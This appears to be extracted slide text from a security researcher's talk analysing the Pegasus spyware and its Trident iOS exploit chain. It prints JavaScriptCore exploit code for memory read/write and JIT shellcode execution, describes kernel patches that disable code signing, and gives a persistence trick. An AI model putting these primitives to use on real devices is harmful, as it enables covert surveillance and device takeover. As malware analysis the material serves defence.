5 6 7 8 9 10 11 12 o Kiev, Ukraine o Staff Security Researcher at Lookout o XNU, Linux and LLVM internals o Obfuscation and DRM systems in a past o Fried Apple team co-founder (8.x and 9.x jailbreaks)
may lead to arbitrary code execution ◦ Remote code execution in Webkit ◦ Vulnerability is use after free ◦ Accomplished by two bugs ◦ Not stable as it relies on WebKit garbage collector CVE-2016-4657 details 1 2 3 4 5 6 7 8 9 10 11 12
= m_capacity * 4; EncodedJSValue* newBuffer = new EncodedJSValue[newCapacity]; for (int i = 0; i < m_capacity; ++i) newBuffer[i] = m_buffer[i]; // copy from stack to heap m_buffer = newBuffer; // move the actual buffer pointer to m_capacity = newCapacity; // the new heap backing slotFor(m_size) = JSValue::encode(v); ++m_size; for (int i = 0; i < m_size; ++i) { Heap* heap = Heap::heap(JSValue::decode(slotFor(i))); if (!heap) continue; m_markSet = &heap->markListSet(); // add the MarkedArgumentBuffer m_markSet->add(this); // to the heap markset break; ... Move buffer from stack to heap Get heap context and add MarkedArgumentBuffer to the heap markListSet Do not add to markset if heap is null Source: http://opensource.apple.com/source/JavaScriptCore/JavaScriptCore-7601.6.13/runtime/ArgList.cpp 1 2 3 4 5 6 7 8 9 10 11 12
19 20 21 22 23 24 User defined method call may release reference to an object Move objects from stack to heap Any reference to a heap property (after the 9th) may be not protected
19 20 21 22 23 24 o Contains shellcode and compressed data o Shellcode used for kernel exploitation in Safari o Compressed data: o Stage 3 loader (downloads and decrypts Stage 3) o Configuration file (keys and links) Stage 2 - Payload
disclose kernel memory ◦ Infoleak used to get the kernel’s addresses to bypass KASLR ◦ Constructor and OSUnserializeBinary methods were missing bounds checking ◦ Uses the OSNumber object with a high number of bits ◦ Trigger happens in is_io_registry_entry_get_property_bytes ◦ Can be triggered from an app’s sandbox 13 14 15 16 17 18 19 20 21 22 23 24 CVE-2016-4655 details
execute arbitrary code with kernel privileges o Use after free to gain kernel level code execution o The setAtIndex macro does not retain an object o Trigger happens in OSUnserializeBinary o Can be triggered from an app’s sandbox CVE-2016-4656 details 13 14 15 16 17 18 19 20 21 22 23 24
31 32 33 34 35 36 o setuid KPP race to escalate privileges o amfi_get_out_of_my_way to disable AMFI o cs_enforcement_disable to disable code signature check o mac_mount and LwVM to remount sys partition Post exploitation – Kernel patches
30 31 32 33 34 35 36 o JSC bug that led to unsigned code execution o Used with rtbuddyd trick to gain persistence o Bad cast in setEarlyValue o Triggerable only from an jsc process context
31 32 33 34 35 36 var DATAVIEW_ARRAYBUFFER_OFFSET = 0x10; var __dummy_ab = new ArrayBuffer(0x20); var __dataview_init_rw = new DataView(__dummy_ab); var __dataview_rw = new DataView(__dummy_ab); // change __dataview_init_rw.m_vector to the address of __dataview_rw setImpureGetterDelegate(__dataview_init_rw, __dataview_rw); // Modify the m_vector of the __dataview_rw JSArrayBufferView to 0 __dataview_init_rw.setUint32(DATAVIEW_ARRAYBUFFER_OFFSET, 0, true); // Modify the m_length of the __dataview_rw JSArrayBufferView to MAX_INT (4gb). // The dataview now effectively maps all of the memory of a 32bit process. __dataview_init_rw.setUint32(DATAVIEW_BYTELENGTH_OFFSET, 0xFFFFFFFF, true); // change the underlying type of the __dataview_rw JSArrayBufferView to FastTypedArray. __dataview_init_rw.setUint8(DATAVIEW_MODE_OFFSET, FAST_TYPED_ARRAY_MODE, true); Trigger bad cast and overwrite m_vector Now we can modify object fields Exploitation – bad cast – RW primitives
31 32 33 34 35 36 var dummy_ab = new ArrayBuffer(0x20); var dataview_leak_addr = new DataView(dummy_ab); var dataview_dv_leak = new DataView(dummy_ab); setImpureGetterDelegate(dataview_dv_leak, dataview_leak_addr); setImpureGetterDelegate(dataview_leak_addr, object_to_leak); leaked_addr = dataview_dv_leak.getUint32(DATAVIEW_ARRAYBUFFER_OFFSET, true); var body = ' ' for (var k = 0; k < 0x600; k++) { body += 'try {} catch(e) {};'; } var to_overwrite = new Function('a', body); for (var i = 0; i < 0x10000; i++) { to_overwrite(); } Leak object address Allocate JIT region, leak address, overwrite with shellcode and execute Exploitation – bad cast – exec primitive
31 32 33 34 35 36 o System will launch “rtbuddyd --early-boot” o Copy jsc as /usr/libexec/rtbuddyd o Copy js exploit as symlink named “--early-boot” o Result will be the same as launch “jsc js_exploit” Persistence mechanism
31 32 33 34 35 36 o One time use links (redirects to Google or other sites) o Obfuscated JavaScript and Objective-C code o Obfuscate strings with AES o Payloads are re-encrypted with a new key on each time o Spyware components are hidden as system services Techniques to prevent analysis
Clears Mobile Safari history and caches o Uses SIP for communication o Removes itself via self destruct mechanisms Techniques to stay undetectable 37 38 39 40 41 42 43 44 45 46 47 48
Records video from camera o Gathers sim card and cell network information o Gathers GPS location o Gathers keychain passwords (including WiFi and router) Techniques to gather data 37 38 39 40 41 42 43 44 45 46 47 48
on each other o On a jailbroken device we can install spying “hooks” o Pegasus uses Cydia Substrate to install app “hooks” o Dynamic libraries are injected into the application processes o Cynject to inject into running processes Application hooking 37 38 39 40 41 42 43 44 45 46 47 48
user interaction required o Exploit chain can be triggered from within the application sandbox o 2011 public jailbreak “jailbreakme 3” is most similar o Luca Todesco use one Trident exploit for jbme in 2016 Historical analysis 37 38 39 40 41 42 43 44 45 46 47 48
Scott-Railton, and Ron Deibert o Lookout: Andrew Blaich, Seth Hardy, John Roark, Robert Nickle, Michael Flossman, Christina Olson, Christoph Hebeisen, Pat Ford, Colin Streicher, Kristy Edwards and Mike Murray o Divergent Security: Cris Neckar, Greg Sinclair o Individual researchers: in7egral Special thanks 37 38 39 40 41 42 43 44 45 46 47 48